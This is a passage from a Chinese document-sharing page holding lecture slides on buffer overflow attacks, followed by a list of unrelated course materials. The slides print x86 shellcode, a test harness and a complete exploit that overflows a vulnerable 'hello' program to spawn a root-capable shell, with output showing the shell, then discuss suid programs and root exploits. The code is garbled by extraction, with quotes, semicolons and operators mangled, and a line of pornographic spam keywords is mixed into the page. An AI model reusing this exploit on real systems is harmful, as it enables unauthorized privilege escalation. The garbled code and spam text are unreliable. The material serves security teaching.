正文內(nèi)容

李鳳華--計算機安全與保密技術(shù)--第十章(編輯修改稿)

2025-03-19 12:32 本頁面

　

【文章內(nèi)容簡介】 xc0” “\x88\x46\x07\x89\x46\x0c\xb0\x0b \x89\xf3\x8d\x4e\x08\x8d\x56\x0c” “\xcd\x80\x31\xdb\x89\xd8\x40\xcd \x80\xe8\xdc\xff\xff\xff/bin/ls。char large_string[128]。main(){ char buffer[96]。 int i。植入代碼自測試程序 (2) long* long_ptr = (long*)large_string。 for (i = 0。 i 32。 i++) long_ptr[i] = (long)buffer。 for (i = 0。 i strlen(shell_code)。 i++) large_string[i] = shell_code[i]。 strcpy(buffer, large_string)。 printf(Is everything OK? :)\n)。} 植入代碼自測試程序 (3)$ ./test1Is everything OK? :)hello test1 完整的攻擊 hello的程序 (1)include include include unsigned char shell_code[] = \xeb\x1f\x5e\x89\x76\x08\x31\xc0” “\x88\x46\x07\x89\x46\x0c\xb0\x0b \x89\xf3\x8d\x4e\x08\x8d\x56\x0c” “\xcd\x80\x31\xdb\x89\xd8\x40\xcd \x80\xe8\xdc\xff\xff\xff/bin/sh。define DEFAULT_OFFSET 0define BUFFER_SIZE 1024 完整的攻擊 hello的程序 (2)unsigned long get_esp(){ __asm__(movl %esp, %eax)。}main(int argc, char** argv){ char* buff。 char* ptr。 unsigned long* addr_ptr。 unsigned long esp。 int i, ofs。完整的攻擊 hello的程序 (3) if (argc == 1) ofs = DEFAULT_OFFSET。 else ofs = atoi(argv[1])。 ptr = buff = malloc(4096)。 /* Fill in with addresses */ addr_ptr = (unsigned long*)ptr。 esp = get_esp()。 printf(ESP = %08x\n, esp)。 for (i = 0。 i 100。 i++) *(addr_ptr++) = esp + ofs。完整的攻擊 hello的程序 (4) /* Fill the start of shell buffer with NOPs */ ptr = (char*)addr_ptr。 memset(ptr,39。A39。,BUFFER_SIZEstrlen(shell_code))。 ptr += BUFFER_SIZE strlen(shell_code)。 /* And then the shell code */ memcpy(ptr, shell_code, strlen(shell_code))。 ptr += strlen(shell_code)。 *ptr = 0。 printf(Is everything OK? :)\n)。 execl(./hello, hello, buff, NULL)。} 完整的攻擊 hello的程序 (5)tly:~/tttt/tt$ ./test2ESP = bffffcd0Is everything OK? :)Hello 一堆亂碼 /bin/shbash$ _ 得出的結(jié)論p一個程序當沒有很好地檢查邊界條件時可能會受到緩沖區(qū)溢出攻擊p有緩沖區(qū)溢出漏洞的程序當它能以特權(quán)用戶身份運行時，可能讓普通用戶無需經(jīng)過認證就可以獲得系統(tǒng)特權(quán) root exploitpRemote root exploit216。通過網(wǎng)絡(luò)，不需認證即可獲得 root權(quán)限pLocal root exploit216。本地普通用戶，利用系統(tǒng)程序的漏洞獲得root權(quán)限哪些程序?qū)⒁蕴貦?quán)用戶身份運行p網(wǎng)絡(luò)服務(wù)程序216。HTTP Server、 FTP Server、 Mail Server, etcpsyslogpTrojian木馬程序psuid/sgid程序 suid/sgid程序pUnix一項特殊技術(shù)，使普通用戶也能做只有超級用戶才能執(zhí)行的任務(wù)216。passwd、 at、 crontab、 pingp普通 rwx之上加上 s位， kernel在載入進程映象時自動將進程有效用戶 /組標識置為映象文件文件屬主 /組p例：216。ls l /usr/bin/passwd216。rsxx 1 root /usr/bin/passwd 還是攻擊 hello的例子tly:~/tttt/tt$ subash chown

點擊復制文檔內(nèi)容

教學課件相關(guān)推薦

現(xiàn)代物流技術(shù)與實務(wù)課件第十章-資料下載頁

【總結(jié)】第十章現(xiàn)代物流綜合管理技術(shù)本章內(nèi)容?第一節(jié)現(xiàn)代物流綜合管理技術(shù)概述?第二節(jié)物流系統(tǒng)規(guī)劃?第三節(jié)物流成本管理與控制技術(shù)?第四節(jié)物流標準化與質(zhì)量管理技術(shù)?第五節(jié)綠色物流技術(shù)本章學習目標?清楚物流綜合管理技術(shù)的概念、目標、原則和意義，掌握其內(nèi)容；?認識物流系統(tǒng)所包含的要

2025-03-05 05:23

計算機網(wǎng)絡(luò)安全保密技術(shù)探索-資料下載頁

【總結(jié)】第一篇：計算機網(wǎng)絡(luò)安全保密技術(shù)探索計算機網(wǎng)絡(luò)安全保密技術(shù)探索摘要：計算機網(wǎng)絡(luò)自身存在著一定的開放性和自由性，而網(wǎng)絡(luò)協(xié)議在制定過程中無疑會滋生一些問題和缺陷，這便使得網(wǎng)絡(luò)安全面臨著嚴峻的挑戰(zhàn)，而...

2024-11-16 23:18

[精選]第十章網(wǎng)絡(luò)安全-資料下載頁

【總結(jié)】第10章網(wǎng)絡(luò)安全第10章網(wǎng)絡(luò)安全1第10章網(wǎng)絡(luò)安全網(wǎng)絡(luò)安全問題概述數(shù)據(jù)加密技術(shù)替代密碼與置換密碼數(shù)據(jù)加密標準DES2第10章網(wǎng)絡(luò)安全公開密鑰密碼體制公開密鑰密碼體制的特點RS

2025-02-08 11:11

第十章信息安全-資料下載頁

【總結(jié)】第十章信息安全目錄上一頁下一頁結(jié)束2020/11/17計算機文化基礎(chǔ)1第10章信息安全信息安全概述計算機病毒防火墻WindowsXP操作系統(tǒng)安全無線局域網(wǎng)安全電子商務(wù)和電子

2025-10-03 05:00

[精選]第十章數(shù)據(jù)的安全與管理-資料下載頁

【總結(jié)】第十章數(shù)據(jù)的安全與管理信息學院要點Access2023數(shù)據(jù)庫安全壓縮與修復數(shù)據(jù)庫數(shù)據(jù)庫打包、簽名和分發(fā)使用信任中心Access2023數(shù)據(jù)庫安全?Access2023數(shù)據(jù)庫安全的概述?創(chuàng)建數(shù)據(jù)庫訪問密碼?為數(shù)據(jù)庫取消密碼保護?為數(shù)據(jù)庫修改密碼?用戶級安全

2025-02-07 00:29

[精選]第十章員工的安全與健康-資料下載頁

【總結(jié)】第十章：員工的安全與健康?本章重點員工的安全與健康概述平橫工作與生活?學習目的自70年代初提出提高員工的安全與健康之后，許多國家的管理協(xié)會、勞工組織和政府有關(guān)部門很快做出了反應，并針對各自情況采取了一些具體對策。

2025-01-08 09:04

[理學]第十章-網(wǎng)絡(luò)安全技術(shù)-資料下載頁

【總結(jié)】第10章網(wǎng)絡(luò)安全技術(shù)學習目標了解網(wǎng)絡(luò)安全與安全威脅了解常規(guī)密鑰密碼體制與公開密鑰密碼體制掌握報文鑒別技術(shù)掌握防火墻的概念與設(shè)計策略了解入侵檢測技術(shù)、網(wǎng)絡(luò)安全協(xié)議10.1網(wǎng)絡(luò)安全問題概述1、網(wǎng)絡(luò)安全的概念?網(wǎng)絡(luò)安全是指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其系統(tǒng)中的數(shù)據(jù)受到保護，不會由于偶然或惡意的原因而遭

2025-01-03 23:55

計算機圖形學英文版課件第十章chapter-資料下載頁

【總結(jié)】ComputerEnglishChapter10ComputerandNetworkSecurityChapter10ComputerandNetworkSecurity計算機專業(yè)英語10-2Keypoints:usefultermsanddefinitionsofputersecurity

2025-10-09 20:14

mba教案第十章-資料下載頁

【總結(jié)】第十章通貨膨脹理論1第一節(jié)通貨膨脹的定義和影響?在媒體上，我們經(jīng)常看到或聽到有關(guān)物價變動率、產(chǎn)出增長率和失業(yè)率等有關(guān)報道。這說明社會公眾普遍關(guān)心這些熱點問題，因為這些問題直接關(guān)系和影響到公眾的生活水平的變化。這一章我們就主要討論有關(guān)這方面的問題。2通貨膨脹的定義所謂通貨膨脹是指一般物價水平的、相當幅度的持

2025-03-05 15:48

第十章生育保險-資料下載頁

【總結(jié)】第十章生育保險,,,生育保險制度是針對女性勞動者生育這一風險而設(shè)置的社會保險項目。世界上大多數(shù)國家將生育保險納入到醫(yī)療社會保險范疇，也有一些國家單獨列為一個險種。中國將生育社會保險從醫(yī)療社會保險中獨立...

2024-11-20 04:20

第十章保險監(jiān)管-資料下載頁

【總結(jié)】第十章保險監(jiān)管,第一節(jié)保險監(jiān)管概述第二節(jié)保險監(jiān)管的主體、客體和內(nèi)容第三節(jié)保險監(jiān)管的模式、方式和手段,教學目的與要求,教學目的：掌握保險監(jiān)管的含義與內(nèi)容，理解保險監(jiān)管的原則，了解我國保險監(jiān)管的進展；熟悉...

2024-11-19 22:12

[精選]第十章促銷-資料下載頁

【總結(jié)】第十章促銷策略第一節(jié)促銷組合決策第二節(jié)廣告第三節(jié)銷售促進第四節(jié)公共關(guān)系第五節(jié)人員推銷1第一節(jié)促銷組合決策?促銷（Promotion）――營銷者將有關(guān)企業(yè)及產(chǎn)品（品牌）的信息通過各種方式傳遞給消費者和用戶，促進其了解、信

2025-01-20 12:26

第十章-保險規(guī)劃-資料下載頁

【總結(jié)】第十章保險規(guī)劃,第一節(jié)風險管理第二節(jié)保險原理第三節(jié)保險規(guī)劃與購買決策,第一節(jié)風險管理,一、家庭面臨的主要風險二、明確家庭風險管理目標三、選擇合適的風險管理技術(shù)四、家庭理財?shù)娘L險控制與監(jiān)測,一、家庭面臨...

2024-11-19 22:12

8第十章稅收與效率-資料下載頁

【總結(jié)】第十章稅收與效率PublicFinance1?第一節(jié)稅收效應?第二節(jié)稅收的超額負擔?第三節(jié)稅收效率分析2第一節(jié)稅收效應政府征稅會產(chǎn)生兩種效應:收入效應和替代效應。一、稅收的收入效應?收入效應是指在相對價格不變的情況下，個人收入的變化對個人福利水平產(chǎn)生的影響。?

2025-01-14 10:08

第十章食品質(zhì)構(gòu)調(diào)整技術(shù)-資料下載頁

【總結(jié)】第十講食品質(zhì)構(gòu)調(diào)整技術(shù)技術(shù)蒸煮擠壓氣流膨化食品質(zhì)構(gòu)（texture）也稱為食品質(zhì)地，是指眼睛、口中的粘膜及肌肉所感覺到的食品的性質(zhì)，包括粗細、滑爽、顆粒感等。邯鄲職業(yè)技術(shù)學院食品質(zhì)構(gòu)是食品的一個重要屬性。作為一門相對獨立的科學技術(shù)，食品質(zhì)構(gòu)學起步較晚。目前，在我國食品科學與工程教學領(lǐng)域，其內(nèi)容與食品物性學、食品感官

2025-01-20 17:20

freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

李鳳華--計算機安全與保密技術(shù)--第十章(編輯修改稿)

現(xiàn)代物流技術(shù)與實務(wù)課件第十章-資料下載頁

計算機網(wǎng)絡(luò)安全保密技術(shù)探索-資料下載頁

[精選]第十章網(wǎng)絡(luò)安全-資料下載頁

第十章信息安全-資料下載頁

[精選]第十章數(shù)據(jù)的安全與管理-資料下載頁

[精選]第十章員工的安全與健康-資料下載頁

[理學]第十章-網(wǎng)絡(luò)安全技術(shù)-資料下載頁

計算機圖形學英文版課件第十章chapter-資料下載頁

mba教案第十章-資料下載頁

第十章生育保險-資料下載頁

第十章保險監(jiān)管-資料下載頁

[精選]第十章促銷-資料下載頁

第十章-保險規(guī)劃-資料下載頁

8第十章稅收與效率-資料下載頁

第十章食品質(zhì)構(gòu)調(diào)整技術(shù)-資料下載頁

李鳳華--計算機安全與保密技術(shù)--第十章-wenkub

李鳳華--計算機安全與保密技術(shù)--第十章(已修改)

李鳳華--計算機安全與保密技術(shù)--第十章(編輯修改稿)

李鳳華--計算機安全與保密技術(shù)--第十章-wenkub.com

李鳳華--計算機安全與保密技術(shù)--第十章(已改無錯字)